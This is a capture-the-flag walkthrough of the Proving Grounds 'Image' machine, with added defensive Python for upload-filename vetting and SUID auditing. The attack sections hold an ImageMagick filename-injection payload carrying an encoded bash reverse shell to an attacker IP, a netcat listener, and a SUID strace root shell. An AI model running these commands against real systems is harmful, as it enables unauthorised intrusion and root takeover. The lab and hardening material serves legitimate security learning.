
Proving Grounds Practice - Image

Difficulty: Medium

scan

autorecon

sudo autorecon 192.168.212.178

[*] ssh found on tcp/22.
OpenSSH 8.2p1


[*] http found on tcp/80.
Apache/2.4.41
ImageMagick Identifier

80 ImageMagick

Upload any file; on success the page shows the version number 6.9.6-4.

foothold

Google search: imagemagick 6.9.6 exploit

https://github.com/ImageMagick/ImageMagick/issues/6339

The issue mentions CVE-2023-34152. Searching again turns up the GitHub repo https://github.com/overgrowncarrot1/ImageTragick_CVE-2023-34152. Clone it and run the script, which generates two image files.

└─$ ls
base.txt '|en"`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjIzNC84MCAwPiYxCg=='$'\n'' | base64 -d | bash`".png' README.md
CVE-2023-34152.py en.png

Upload the '|en....png' file and a shell comes back. cat /etc/passwd shows that root is the only user account.

rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.178] 46508
bash: cannot set terminal process group (1169): Inappropriate ioctl for device
bash: no job control in this shell
www-data@image:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
fwupd-refresh:x:113:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
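The defensive counterpart to this foothold, as an added example that is not part of the original writeup or of the exploit repo: the linked issue concerns ImageMagick treating a filename that begins with `|` as a pipeline to open, so the payload above never touches the image bytes, only the name. Besides upgrading ImageMagick, an upload handler should never hand the client-supplied name to it. The hypothetical `vet_upload` below rejects names carrying shell or coder syntax and stores accepted files under a server-generated random name, keeping only a vetted extension. The sample names are constructed; the first mirrors the shape of the payload filename above.

```python
import os
import secrets

# Extensions this (hypothetical) upload endpoint accepts; constructed policy for the example.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Characters with meaning to a shell or to ImageMagick's filename parser:
# '|' opens a pipe, backticks/$/quotes drive shell substitution, ':' selects a
# coder prefix (e.g. "msl:"), '@' reads a list of filenames from a file.
_META_CHARS = set('|`"\'$;&<>(){}[]\\\n\r\x00:@')


def is_suspicious_filename(name: str) -> bool:
    """True when a client-supplied filename carries shell or coder syntax."""
    return any(ch in _META_CHARS for ch in name)


def vet_upload(client_name: str) -> tuple[bool, str]:
    """Decide whether an upload may be stored and, if so, under what name.

    Returns (True, storage_name) or (False, reason). The client name only
    contributes an extension; the basename becomes random hex, so nothing
    attacker-controlled is ever used as the path handed to ImageMagick.
    """
    # Strip any directory component, whichever separator the client used.
    base = os.path.basename(client_name.replace("\\", "/"))
    if not base:
        return False, "empty filename"
    if is_suspicious_filename(base):
        return False, "filename contains shell or coder metacharacters"
    if "." not in base:
        return False, "missing extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext}' not allowed"
    return True, f"{secrets.token_hex(16)}.{ext}"


def is_storage_name(name: str) -> bool:
    """Check that a name has the server-generated shape: 32 hex chars plus an allowed extension."""
    stem, _, ext = name.rpartition(".")
    return (len(stem) == 32
            and all(c in "0123456789abcdef" for c in stem)
            and ext in ALLOWED_EXTENSIONS)


# Constructed sample names; the first mirrors the shape of the payload filename above.
SAMPLE_NAMES = [
    '|en"`echo cGF5bG9hZA== | base64 -d | bash`".png',
    "holiday.PNG",
    "../../etc/holiday.jpg",
    "shell.php",
    "msl:poly.png",
]

if __name__ == "__main__":
    for name in SAMPLE_NAMES:
        ok, detail = vet_upload(name)
        print(f"{'ACCEPT' if ok else 'REJECT'} {name!r}: {detail}")
```

The point of the random storage name is that rejection alone is fragile (a blocklist of characters will miss something); what actually closes the hole is that the path ImageMagick sees is chosen by the server, not the client.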

escalation

Download and run linpeas; it finds strace with the SUID bit set. GTFOBins lists the abuse method: /usr/bin/strace -o /dev/null /bin/sh -p gives root.

https://gtfobins.github.io/gtfobins/strace/

www-data@image:/var/www/html$ /usr/bin/strace -o /dev/null /bin/sh -p
/usr/bin/strace -o /dev/null /bin/sh -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cd /root
ls
ImageMagick-7.1.0-16
email2.txt
proof.txt
snap
cat proof.txt
056bd9764a79f6e07150768696acf296
whoami
root
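The hardening side of this escalation, as an added example that is not part of the original writeup: a SUID bit on strace (or any program that runs or traces arbitrary commands) is a root shell for whoever can execute it, and the check an admin should run is the same one linpeas ran. The script below (hypothetical names `classify_suid`, `walk_suid`, `remediation`) sorts SUID files into an expected baseline, a never-SUID set, and everything else that needs review, and prints the `chmod u-s` commands for the dangerous ones. The baseline and the sample entries are constructed for the example; the sample mirrors the box above, where strace was the odd one out.

```python
import os
import stat

# SUID binaries a stock Ubuntu 20.04 host is expected to carry (assumed baseline; adjust per image).
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/fusermount", "/usr/bin/pkexec",
}

# Programs that hand over a root shell when SUID because they run or trace
# arbitrary commands; strace is the one that mattered on this box.
NEVER_SUID = {"strace", "gdb", "bash", "sh", "dash", "python3", "perl", "env"}


def classify_suid(entries):
    """Sort (path, st_mode) pairs into expected / dangerous / unexpected SUID files."""
    report = {"expected": [], "dangerous": [], "unexpected": []}
    for path, mode in entries:
        # Only regular files with the set-user-ID bit are of interest.
        if not stat.S_ISREG(mode) or not mode & stat.S_ISUID:
            continue
        if os.path.basename(path) in NEVER_SUID:
            report["dangerous"].append(path)
        elif path in EXPECTED_SUID:
            report["expected"].append(path)
        else:
            report["unexpected"].append(path)
    return report


def remediation(report):
    """Commands an admin would run to strip the bit from the dangerous entries."""
    return [f"chmod u-s {path}" for path in report["dangerous"]]


def walk_suid(root="/"):
    """Yield (path, st_mode) for files under root, skipping pseudo-filesystems."""
    skip = ("/proc", "/sys", "/dev", "/run")
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(skip):
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue


# Constructed sample modes and entries modelled on the box above; not a real scan.
SUID_REG = stat.S_IFREG | stat.S_ISUID | 0o755
PLAIN_REG = stat.S_IFREG | 0o755
SAMPLE_ENTRIES = [
    ("/usr/bin/strace", SUID_REG),
    ("/usr/bin/passwd", SUID_REG),
    ("/usr/bin/ls", PLAIN_REG),
    ("/opt/backup/helper", SUID_REG),
]

if __name__ == "__main__":
    # For a live host use classify_suid(walk_suid("/")) instead of the sample list.
    report = classify_suid(SAMPLE_ENTRIES)
    for bucket, paths in report.items():
        for path in paths:
            print(f"{bucket:10} {path}")
    for cmd in remediation(report):
        print("fix:", cmd)
```

Anything landing in the unexpected bucket deserves the same scrutiny as the dangerous one; the never-SUID set is only the short list of well-known cases, and GTFOBins (linked above) is the place to extend it from.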